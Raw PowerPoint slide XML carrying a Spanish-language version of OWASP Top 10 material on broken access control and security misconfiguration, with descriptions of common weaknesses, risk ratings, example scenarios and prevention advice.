              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-AR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Si un usuario no autenticado puede acceder a cualquier página o, si un usuario no-administrador puede acceder a la página de administración, esto es una falla</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a: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200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-AR" sz="840" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Las restricciones de control de acceso implican que los usuarios no pueden actuar fuera de los permisos previstos. Típicamente, las fallas conducen a la divulgación, modificación o destrucción de información no autorizada de los datos, o a realizar una función de negocio fuera de los límites del usuario.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-AR" sz="840" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Las vulnerabilidades comunes de control de acceso incluyen:</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Pasar por alto las comprobaciones de control de acceso modificando la URL, el estado interno de la aplicación o HTML, utilizando una herramienta de ataque o una conexión vía API.</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Permitir que la clave primaria se cambie a la de otro usuario, pudiendo ver o editar la cuenta de otra persona.</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Elevación de privilegios. Actuar como un usuario sin iniciar sesión, o actuar como un administrador habiendo iniciado sesión como usuario estándar.</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Manipulación de metadatos, como reproducir un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="840" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>token</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="840" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> de control de acceso </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="840" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>JWT (JSON Web Token)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="840" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, manipular una </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="840" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="840" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> o un campo oculto para elevar los privilegios, o abusar de la invalidación de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="840" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>tokens</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="840" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> JWT.</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La configuración incorrecta de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="840" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>CORS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="840" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> permite el acceso no autorizado a una API.</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Forzar la navegación a páginas autenticadas como un usuario no autenticado o a páginas privilegiadas como usuario estándar.</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Acceder a una API sin control de acceso mediante el uso de verbos POST, PUT y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rgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>OWASP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:hlinkClick r:id="rId6"/>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Access Control</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Externos</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:hlinkClick r:id="rId6"/>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PortSwigger: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200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-AR" sz="840" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>El control de acceso sólo es efectivo si es aplicado del lado del servidor o en </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Server-less</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> API</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="840" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, donde el atacante no puede modificar la verificación de control de acceso o los metadatos.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Con la excepción de los recursos públicos, la política debe ser denegar de forma predeterminada.</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Implemente los mecanismos de control de acceso una vez y reutilícelo en toda la aplicación, incluyendo minimizar el control de acceso HTTP (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="840" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>CORS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="84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Los controles de acceso al modelo deben imponer la propiedad (dueño) de los registros, en lugar de aceptar que el usuario puede crear, leer, actualizar o eliminar cualquier registro.</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Los modelos de dominio deben hacer cumplir los requisitos exclusivos de los límites de negocio de las aplicaciones.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Deshabilite el listado de directorios del servidor web y asegúrese que los metadatos/fuentes de archivos (por ejemplo de GIT) y copia de seguridad no estén presentes en las carpetas públicas.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Registre errores de control de acceso y alerte a los administradores cuando corresponda (por ej. fallas reiteradas).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Limite la tasa de acceso a las APIs para minimizar el daño de herramientas de ataque automatizadas.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Los </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="840" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>tokens</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="840" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> JWT deben ser invalidados luego de la finalización de la sesión por parte del usuario.</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Los desarrolladores y el personal de QA deben incluir pruebas de control de acceso en sus pruebas unitarias y de integración</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="840" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="es-AR" sz="84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A5</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t>Pérdida de Control de Acceso</a:t>
            </a:r>
            <a:endParaRPr lang="es-AR" noProof="0"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8883993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Explotabilidad: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tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Prevalencia: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tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Detectabilidad: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Técnico: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="9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9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s-AR" sz="860" noProof="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>La explotación del control de acceso es una habilidad esencial de los atacantes. Las herramientas </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-AR" sz="860" noProof="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId16"/>
                        </a:rPr>
                        <a:t>SAST</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-AR" sz="860" noProof="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> y </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-AR" sz="860" noProof="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId17"/>
                        </a:rPr>
                        <a:t>DAST</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-AR" sz="860" noProof="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> pueden detectar la ausencia de controles de acceso pero, en el caso de estar presentes, no pueden verificar si son </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-AR" sz="860" kern="1200" noProof="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>correctos. Es detectable utilizando medios manuales o de forma automática en algunos </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-AR" sz="860" i="1" kern="1200" noProof="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>frameworks</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-AR" sz="860" kern="1200" noProof="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> que carecen de controles de acceso.</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s-AR" sz="860" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Las debilidades del control de acceso son comunes debido a la falta de detección automática y a la falta de pruebas funcionales efectivas por parte de los desarrolladores de aplicaciones.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="es-AR" sz="860" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>La detección de fallas en el control de acceso no suele ser cubierto por pruebas automatizadas, tanto estáticas como dinámicas.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="86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s-AR" sz="860" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>El impacto técnico incluye atacantes anónimos actuando como usuarios o administradores; usuarios que utilizan funciones privilegiadas o crean, acceden, actualizan o eliminan cualquier registro.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="es-AR" sz="860" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>El impacto al negocio depende de las necesidades de la aplicación y de los datos</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="860" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a: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200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="860" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Escenario #1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="860" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="860" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>el servidor de aplicaciones viene con ejemplos que no se eliminan del ambiente de producción. Estas aplicaciones poseen defectos de seguridad conocidos que los atacantes usan para comprometer el servidor. Si una de estas aplicaciones es la consola de administración, y las cuentas predeterminadas no se han cambiado, el atacante puede iniciar una sesión</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="860" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="860" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Escenario #2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="860" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="860" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>el listado de directorios se encuentra activado en el servidor y un atacante descubre que puede listar los archivos. El atacante encuentra y descarga las clases de Java compiladas, las descompila, realiza ingeniería inversa y encuentra un defecto en el control de acceso de la aplicación</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="860" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="860" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Escenario #3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="860" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="860" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>la configuración del servidor de aplicaciones permite retornar mensajes de error detallados a los usuarios, por ejemplo, las trazas de pila. Potencialmente esto expone información sensible o fallas subyacentes, tales como versiones de componentes que se sabe que son vulnerables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="860" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="860" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Escenario #4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="860" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="860" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>un proveedor de servicios en la nube (CSP) por defecto permite a otros usuarios del CSP acceder a sus archivos desde Internet. Esto permite el acceso a datos sensibles almacenados en la nube</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="860" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a: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200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-AR" sz="840" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>La aplicación puede ser vulnerable si:</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Falta </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="840" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>hardening</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="840" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
